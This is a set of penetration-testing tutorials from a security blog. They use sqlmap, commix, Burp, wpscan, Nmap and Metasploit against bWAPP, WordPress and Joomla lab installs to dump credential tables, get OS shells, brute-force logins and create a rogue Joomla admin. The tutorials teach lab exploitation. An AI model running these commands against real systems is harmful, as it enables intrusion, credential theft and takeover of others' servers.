Database Penetration Testing using Sqlmap (Part 1)

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  • Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.

For more details visit their official site sqlmap.org

 Firstly you need to install bWAPP lab in your XAMPP or WAMP server, read full article from here now open the bWAPP in your pc and login with following credentials:

Let’s begin!!!

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.101:81/bWAPP/login.php. Enter user and password as bee and bug respectively.

Set security level low, from list box chooses your bug select SQL-Injection (GET/SEARCH) now and click on hack.

Type any name of movie in the text field and just after that start the burp suite in kali Linux.

To capture the cookie of bWAPP click on proxy tag then click to inception is on button, come back to bWAPP and now click to submit. Use intercepted data within sqlmap commands.

Open the terminal in kali Linux and type the sqlmap command.

From intercepted data under burp suite copy the referrer, cookie and target and use this in the following command.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –dbs

This tool will now analysis the url for making connection from target and then use sql queries in given cookies for sql injection attack and fetch all names of database. So if you notice image given below we have caught all name of database. Choose any name for fetching more details.

I am interested in bwapp so that I could fetch all table under bwapp therefore I will type following command on terminal.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –dbs –D bwapp –tables

Here we have got 5 tables name which are: blog, heroes, movies, users, visitors.

Now if you want to penetrate more about table use the following command for each and every table.

I want to know columns details of blog table using above as I have got it as you can see in image given below.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –dbs –D bwapp –T blog –columns

This command fetches all columns of blog table. It shows there are 4 columns with their data types.

To know more about blog table now I will seek its column from inside using following command which will dump all field inside blog’s columns.

 sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ -D bwapp –T blog –C date,entry,id,owner –dump

Blog table appears to be empty as all fields are left blank.

I want to know columns details of users table.

 sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –dbs –D bwapp –T users –columns

We have got all columns of users table with their data types.

Again I will seek its column from inside use the following command which will now dump all fields inside user’s columns.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –D bwapp –T users –C id,emails,login,password,secret –dump

Here I founds only two entries as you see sqlmap has dump only those column which I have mentioned in command not the whole table.

Repeat the whole process again for table movies.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –D bwapp –T movies –columns

In same way this tool has fetched all columns with their data types under movie table.

Again I want to penetrate its column so I will use same command by modifying its table name.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –D bwapp –T movies –C genre,id,imdb,main_character,release_year,tickets_stock,title –dump

Wow!! Their are10 entries as if you will see this tool have again dump all data for which I had made request.

Once again repeat the whole process for table heroes.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ –D bwapp –T heroes –columns

We have 4 columns with their data types.

For more information repeat the process which will dump details under its columns.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ -D bwapp -T heroes -C id,login,password,secret –dump

We have got id, login, password and secret entries. Read the details from table.

Again repeat the same process for our last table which is visitors.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ -D bwapp -T visitors –columns

Table visitors are also having 4 columns with its data types.

Let’s penetrate its columns also

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ -D bwapp -T visitors -C date,id,ip_address,user_agent –dump

Cool!!! Like blog table it is also left blank. But the task is not ended here the more interesting things begins now.

We have traverse each and every table completely but more important than to fetch details of tables is to gain access of os-shell for any web server.

sqlmap -u “http://192.168.1.101:81/bWAPP/sqli_1.php?title=thor&action=search” –cookie=”BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=8fqkaoh1j1n6pc1ea0ovmane43″ -D bwapp –os-shell

Above command will try to generate a backdoor; type 4 for PHP payload and type 1 for common location to use as writable directory.

Awesome!!!  We got the shell.

os-shell> net users

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

5 ways to Brute Force Attack on WordPress Website

Brute force attack using Burp Suite

To make Burp Suite work, firstly, we have to turn on manual proxy and for that go to the settings and choose Preferences. Then select advanced option and further go to Network then select Settings.

Now, select Manual proxy Configuration type your localhost address in HTTP proxy tab and set port to 8080. Click OK

Now open the WordPress in your pc and it will ask you the username and password. Here, before giving username and password start burp suite and select Proxy tab and turn on interception by clicking on Interception is on/off button.

When you turn on the interception then type any password of your predictions so that the burp suite can capture it. Look at image please notice the last line in fetched data it is show that I tried to login by type admin:admin as username and password respectively.

Send the captured material to the intruder by right clicking on the space and choosing Send to Intruder option or simply press ctrl + i

Now open the Intruder tab then select Positions tab without disturbing data click on clear button on right side of frame.

Now select the following as I have selected in the image and click on add button on the right side of frame. This will configure the position where payloads will be inserted into the base request.

Select the type of attack to determine the way in which payload are assigned to payload positions. I will choose cluster bomb as the number of payload set is depend upon attack type and we are having 2 payload positions. Click on start attack.

Click on payload set which will show two numeric numbers 1 and 2 select number 1 for first payload position. Further click on load button in payload option and configure your simple list string that will use as payload or you can add path of any dictionary username only. Similarly select number 2 for another payload position. Add path of any dictionary having password only. Click on start attack.

Now brute attack will match the combination of both payload and try to login in with username and password.

When attack will finished you would get the sure credential by checking status and length which would be different from rest of combination.

From result user:bitnami is username and password respectively.

Brute force attack using wpscan

WPScan is a black box vulnerability scanner for WordPress which is already installed by default in Kali Linux. For WordPress brute force you need a good dictionary or can make your own dictionary for attack.

ruby ./wpscan.rb –url 192.168.1.14 – wordlist /root/Desktop/pass.txt –username user

In this brute force attack I have just added wordlist for password. From result user:bitnami is login and password respectively.

Brute force attack using metasploit

This module will test WordPress logins on a range of machines and report successful logins. If you have loaded a database plug-in and connected to a database this module, it will record successful logins and hosts so you can track your access.

msf > use auxiliary/scanner/http/wordpress_login_enum

msf auxiliary(wordpress_login_enum) > set rhosts 192.168.1.4

msf auxiliary(wordpress_login_enum) > set rport 80

msf auxiliary(wordpress_login_enum) > set user_file /root/Desktop/user.txt

msf auxiliary(wordpress_login_enum) > set pass_file /root/Desktop/pass.txt

msf auxiliary(wordpress_login_enum) > exploit

 WordPress brute force successful for login user:bitnami  as username and password.

Brute force attack using OWASP ZAP

Zap is an easy to use integrated penetration testing tool for finding the vulnerabilities in web application. Now we will use this tool for brute force attack and the whole process is same as burp suite.

Start OWASP ZAP and turn on manual proxy and for that go to the settings and choose Preferences. Then select advanced option and further go to Network then select Settings. Select Manual proxy Configuration type your localhost address in HTTP proxy tab and set port to 8080. Click OK

 Now once again open the WordPress in your pc and it will predict the username and password.

It will capture the data as you can see I have login with user as username and password as password. You can see it in the Request section of the tool select the character which you have entered in the page before. Therefore I will select only password from fetched data then use right click for fuzz option.

When you click on fuzz a new window ‘fuzzer’ will get open, now you have to click on add button on left of frame it will open a new window add payload. Click on select and choose your dictionary for attack.

Again click on add button and then click on start fuzzer.

After starting fuzzing again a new screen will open click on option button click to depth first radio button for payload replacement strategy. Select the check box of follow redirects and click to start fuzzing.

When attack will finished you would get the sure credential by checking state and size response header which would be different from rest of combination.

From result bitnami is password for login user.

Brute force attack using Nmap

This script uses the unpwdb and brute libraries to perform password guessing. Any successful guesses are stored using the credentials library.

Open Kali terminal type following Nmap command

 nmap –sV – script http-wordpress-brute – script-args ‘userdb=/root/Desktop/login.txt,passdb=/root/Desktop/pass.txt, http-wordpress-brute.hostname=domain.com,http-wordpress-brute.thread=3,brute.firstonly=true’ 192.168.1.17

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

bWAPP Command Injection Exploitation using Commix (Bypass All Security)

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

https://www.owasp.org/index.php/Command_Injection

Requirement:

Xampp/Wamp Server

bWAPP Lab

Kali Linux: Burp suite, Commix tool

Very first you need to setup bWAPP lab in your XAMPP or WAMP server, for this you can visit to my previous article web Pentest lab setup using bwapp here.

Now I m going to perform os command injection attack using bWAPP

Start service Apache and Mysql in Xampp or Wamp server. Let’s open the local host address in browser as I am using 192.168.1.103:81/bWAPP/login.php. Enter user and password bee and bug respectively.

 My task is to bypass all three security level in bWAPP through os command injection.

 Let start!

 Set security level: low

 Look at below image I have set the security level low, from option choose you bug select os command injection now and click on hack.

Type the IP in the DNS lookup field and just after that start the burp suite in kali Linux. Don’t forget to set proxy in your browser while using the burp suite.

 To capture the cookie of bWAPP click on proxy option then click to inception is on button, come back to bWAPP and now click to DNS.

 As you can see I have capture the cookie in burp suite.

Open the terminal in kali Linux and type the commix command.

From fetched data under burp suite copy referrer, cookie and target use this in the following command

 commix –url=”http://192.168.1.103:81/bWAPP/commandi.php” –cookie=”PHPSESSID=7pegaf9inlf9iddhb7341k7se7; security_level=0″ –data=target=”192.168.1.103&form=submit”

This command will execute the commix tool in terminal which automatically perform command injection attack using url and cookie information in bWAPP.

Type ‘y’ to resume the classic injection point and to pseudo terminal shell.

Attack is successful commix provided a commix os shell

Commix (os_shell) > syseteminfo

Set security level: medium

Look at below image now I have set the security level medium, from option choose you bug select os command injection now and click on hack.

Repeat the process again as above, Type the IP in the DNS lookup field and just after that start the burp suite.

Click to inception is on, come back to bWAPP and now click to DNS. As you can see I have capture the cookie for medium level in burp suite.

From fetched data under burp suite copy referrer, cookie and target use this in the following command.

 commix–url=”http://192.168.1.103:81/bWAPP/commandi.php”–cookie=”PHPSESSID=7pegaf9inlf9iddhb7341k7se7;security_level=1″–data=target=”192.168.1.103&form=submit”

Type ‘y’ to resume the classic injection point and to pseudo terminal shell.

Attack is successful in medium security and again commix provided a commix os shell.

Commix (os_shell) > ipconfig

Set security level: high

After achieving os shell of low and medium my next mode is high security, now I m trying to bypass this level by repeating same process once again.

 Set security high, choose your bug os command injection and click on hack.

Type the IP in the DNS lookup field and just after that start the burp suite in kali Linux. From fetched data under burp suite copy referrer, cookie and target use this in the following command.

commix–url=”http://192.168.1.103:81/bWAPP/commandi.php”–cookie=”PHPSESSID=7pegaf9inlf9iddhb7341k7se7;security_level=2″–data=target=”192.168.1.103&form=submit”

Type ‘y’ to resume the classic injection point and to pseudo terminal shell. We have successfully bypass high level also with the same process.  

Commix (os_shell) > systeminfo

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Exploiting Joomla Website using Account Creation and Privilege Escalation

In this article we will learn about hacking Joomla CMS. And to so we will be a pre-instaled module of metasploit which will further help us to create an autocratic account with administrative privileges in Joomla versions 3.4.4 through 3.6.3. Ttherefore, if an email server is arranged in Joomla, an email will be sent to activate the account (the account is disabled by default).

 Exploit Targets

Joomla 3.4.4 through 3.6.3

Requirement

Attacker: kali Linux

Victim PC: Joomla 3.4.4

Open terminal in Kali and type msfconsole to start metasploit.

Once metasploit is opened then type the following commands to execute the attack:

use auxiliary/admin/http/joomla_registration_privsec

msf exploit (joomla_registration_privsec)>set rhost 192.168.0.103

msf exploit (joomla_registration_privsec)>set username raj

msf exploit (joomla_registration_privsec)>set password raj123

msf exploit (joomla_registration_privsec)>set email raj@hackingarticles.in

msf exploit (joomla_registration_privsec)>set targeturi /joomla

msf exploit (joomla_registration_privsec)>exploit 

Performing this attack will allow you to create a desirable username and password like in this case I have given username :  raj and password : raj123 along with email ID : raj@hackingarticles.in

In the image below you can see that a new user will be created by the username and passwords that you provided.

And as you have created a username you can log in using the said username.

Thus, you can hack Joomla CMS in the most simplest of the way.

Related Posts Plugin for WordPress, Blogger...